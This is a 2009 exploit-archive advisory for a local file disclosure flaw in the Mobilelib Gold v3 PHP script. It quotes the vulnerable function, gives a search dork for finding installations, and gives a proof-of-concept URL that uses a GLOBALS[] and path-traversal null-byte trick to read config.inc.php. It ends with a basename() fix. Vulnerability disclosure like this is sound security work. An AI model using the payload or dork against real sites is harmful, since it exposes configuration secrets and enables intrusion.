[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mobilelib Gold v3 Local File Disclosure Vulnerability
# Published : 2009-07-14
# Author : Qabandi
# Previous Title : DJ Calendar (DJcalendar.cgi TEMPLATE) File Disclosure Vuln
# Next Title : Traidnt UP 2.0 Remote Blind SQL Injection Exploit


||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ__
                                        __/QQQ/````````````````QQQ___
                                      _/QQQQQ/                  QQQQQQ
                                     /QQQQ/``                    ```QQQQ
                                    /QQQQ/                          QQQQ
                                   |QQQQ/    By  Qabandi             QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ       iqa[a]hotmail.fr     /QQQQ|
                                    QQQQ                      __  /QQQQ/
                                     QQQQ                    /QQ_QQQQ/
                                      QQQQ                   QQQQQQQ/
                                       QQQQQ                 /QQQQQ/_
                                        ``QQQQQ_____________/QQQ/QQQQ_
                                           ``QQQQQQQQQQQQQQQQQQQ/  `QQQQ
                                              ```````````````````     `````

=Vuln:		Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO:		http://www.ac4p.com/
=BUY:  		http://www.ac4p.com/
=Download:      ~~~
=DORK:		intext:"English for dummies"

                                  ____________
                              _-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE ON :)

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align="center"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>";
      }
      return $html;
}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
 We will bypass the security, where it takes all _GET variables and scans if
 they contain harmful tags such as the null char (%00) ..etc
 
 We will bypass it by using an old GLOBALS[] trick ;)


http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      $page = basename($page); //<---- Added the good old Basename func ;)
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align="center"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>";
      }
      return $html;
}


---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              
|      Sec-Code.com ;)  Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!!   |
______________________________________________________________________________/
                                 No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# www.Syue.com [2009-07-14]